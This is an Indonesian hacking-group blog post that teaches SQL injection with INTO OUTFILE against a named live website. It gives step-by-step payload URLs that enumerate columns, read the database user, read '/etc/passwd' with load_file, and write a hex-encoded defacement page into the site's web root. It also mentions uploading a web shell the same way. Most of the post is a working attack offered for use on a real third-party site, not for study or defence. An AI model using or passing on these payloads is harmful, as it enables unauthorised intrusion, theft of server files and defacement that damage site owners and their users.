input license here
Powered by Blogger
Theme images by Igniel

Report Abuse

Search This Blog

Author
Your Name

Featured Post

Download Aplikasi DroidSQLI Mods v1.0

Download Aplikasi DroidSQLI Mods v1.0

Assalamualaikum,halo pengunjung selamat datang di blog Bomber Cyber Army, pada artikel kali ini saya akan memberikan Download Aplikasi DroidSQLi Mods v1.0. Droid SQLI DroidSQLi adalah aplikasi yang sangat mengagumkan dan sempurna untuk meretas dan m…
Home  ›  Uncategorized

SQLI TO IOF

- Post a Comment

Assalamualaikum kali ini saya akan kasih tutorial sqli to iof

Untuk live target we udah sediain

https://lexsite.com/latestArticle.php?id=5

Langkah pertama 1 pasti pada tau ,kita pantest sqli seperti biasanya

Kita order by seperti biasanya https://lexsite.com/latestArticle.php?id=5+order+by+6

Nah kita sudah menemukan columnya
Tinggal kita union-select seperti biasanya

https://lexsite.com/latestArticle.php?id=5+union+select+1,2,3,4,5,6--+-

Nah setelah Kita union select kita cari angka ajaib nya disini kok gak muncul yak
Tingal kita tambahkan -didepan angka param

https://lexsite.com/latestArticle.php?id=-5+union+select+1,2,3,4,5,6--+-

Dan muncul angka 2

di bagian angka togel kita cek user nya dulu dengan cara user ()

https://lexsite.com/latestArticle.php?id=-5+union+select+1,user (),3,4,5,6--+-

Jika user nya root localhost kemungkinan bisa kita iof

https://lexsite.com/latestArticle.php?id=-5+union+select+1,user (),3,4,5,6--+-

Disini root nya sesuai dengan nama website nya tapi tidak menutup kemungkinan juga untuk di iof

Habis itu kita ngapain ya bang,tempel Dios wkwk sans nanti dulu, sekarang kita cari path nya buat into out file

Untuk payload nya disini saya gunakan load_file('/etc/passwd')

Setiap payload berbeda buat pangil path nya tergantung webnya juga oke

https://lexsite.com/latestArticle.php?id=-5+union+select+1,2,3,4,5,6--+-

Tadi angka togel nya di 2

https://lexsite.com/latestArticle.php?id=-5+union+select+1,load_file('/etc/passwd'),3,4,5,6--+-

Kita enter

Nah kok eror disini kita menemukan
 
Nah kita menemukan pathnya di F:\ContentSite\ yang belakang nya gak usah di salin wkwk itu halaman directory pokoknya sampai akhir path / kedua terakhir

F:\ContentSite\

Oke untuk path kita geser menjadi

F:/ContentSite/

Untuk menyesuaikan path di web

https://lexsite.com/latestArticle.php?id=-5+union+select+1,2,3,4,5,6--+-

Oke kita masukkan payload into+outfile+'/var/www/html/shell.php'

Nah untuk memasukkan path kita kita ganti dengan path yang tadi di bagian

https://lexsite.com/latestArticle.php?id=-5+union+select+1,2,3,4,5,6+into+outfile+'F:/ContentSite/contoh.php'--+-

https://lexsite.com/latestArticle.php?id=-5+union+select+1,2,3,4,5,6+into+outfile+'F:/ContentSite/contoh.php'--+- 


Oke untuk di bagian ini kita memasukkan file juga ,tapi bedanya disini memasukkan nya ke angka togel ,,nah

Caranya?

Sama seperti kita memasukkan Dios bagian abjad harus di decyrpt ke heex 


Untuk tols nya 

https://www.online-toolz.com/tools/hex-to-text-converter.php

Saran untuk file nya bahasa html

Nah jika sudah kita decyrpt 

Hasilnya

Jangan lupa kita tambahkan 0xdecyprt kita biar ke eksekusi

0x3109320933093409030a5c0a315c09325c09335c09345c093c62723e3c62723e3c62723e3c7469746c653e4d314e3120534845334c3c2f7469746c653e3c63656e7465723e3c696d67207372633d2768747470733a2f2f692e6962622e636f2f6d5233747042332f696d616765732d31312e6a7067273e3c62723e3c617564696f207372633d2268747470733a2f2f632e746f7034746f702e696f2f6d5f31363434327362626f302e6d70332220636f6e74726f6c73206175746f706c61793e3c2f617564696f3e3c62723e3c62723e3c62723e3c666f6e7420666163653d2252616e63686f222073697a653d223670782220636f6c6f723d22626c61636b223e496e6a6563746564204279207a65726f67616e733c62723e3c62723e62757365742068656b65723c62723e3c666f6e7420636f6c6f723d22726564223e6e6a6972206a6177613a763c62723e3c666f6e743e3c666f6e7420636f6c6f723d22726564223e5a65726f5f48347830723c2f666f6e743e3c62723e3c62723e3c62723e3c666f6e7420636f6c6f723d22726564223e49464f52434520534543205445414d3c2f666f6e743e3c666f6e7420636f6c6f723d22626c61636b223e2058203c2f666f6e743e3c666f6e7420636f6c6f723d22626c61636b223e496e646f466f726365735465616d3c2f666f6e743e3c62723e3c62723e3c62723e5c5c5c095c09365c09375c09380a5c0a09360937

Nah kita tinggal melakukan langkah terakhir

https://lexsite.com/latestArticle.php?id=-5+union+select+1,file hex yang tadi,3,4,5,6+into+outfile+'F:/ContentSite/numex.html'--+-

Nama file bebas 

Note jangan lupa tambahkan 0x

Jika semua sudah siap kita enter aja

Nah disini sudah saya exsekusi

Tinggal kita cek ke up apa ndak caranya kita cek di publik html nya

https://lexsite.com/namasc lu.html

Disini punya saya

https://lexsite.com/numex.html

Untuk upload Shell juga bisa mungkin belum we coba juga :v ,tapi kita sama harus up file hex uploader,, untuk uploader hex cek di dh ada

Oke sekian materi nya terima kasih
Semoga bermanfaat 

Materi by : ObitoHaxor

Newer Older
BomberCyberArmy
Gw F4K3_5M1LE

Related Posts

Post a Comment